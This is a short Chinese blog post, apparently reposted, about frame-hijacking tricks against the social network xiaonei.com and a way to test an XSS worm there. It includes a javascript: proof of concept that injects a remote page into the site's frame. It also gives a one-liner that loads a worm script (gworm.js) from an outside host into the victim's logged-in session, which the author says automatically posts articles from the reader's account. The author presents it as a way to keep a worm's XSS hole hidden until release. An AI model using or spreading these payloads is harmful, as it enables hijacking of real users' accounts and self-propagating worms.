汗……本来在讨论这个的http://www.gnucitizen.org/blog/ghost-busters/,有意思:
<a href="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20'http://127.0.0.1/myframe.html';}}}catch(e){}},3000);void(1);">Sample PoC Here.</a>
打 开代码中javascript链接时,远程的myframe.html会被嵌入到www.xiaonei.com上。详细的见上面这个网址。很快我就想是 否能同理于<iframe>将<script>里的src替代为我的远程js呢?不行……上面代码x代表一个window对 象,iframe内嵌框架的父级对象就是window,而script标签的父级对象是document。当open一个新窗口时,我们仅能获取这个 window对象。其他的怎么回事。我迷糊了。回归主题:同域内测试蠕虫的一种方法。
我这拿校内网做实验,在浏览器地址栏直接输入(你可以试试下面这段代码,执行后会自动帮你发一篇新文章):
javascript:x=open('http://home.xiaonei.com/Home.do');setTimeout("document.scripts[0].src='http://www.0x37.com/Project/gworm.js'",3000);void(1);
这样gworm.js就可以为所欲为了(依赖于你的校内网帐户权限),代码的执行效率可比手动高得多:)。以后就没必要每次测试蠕虫时就利用一次XSS,这样可以防止XSS Trap在没爆发之前暴露:)
from:http://www.0x37.com/post/15.html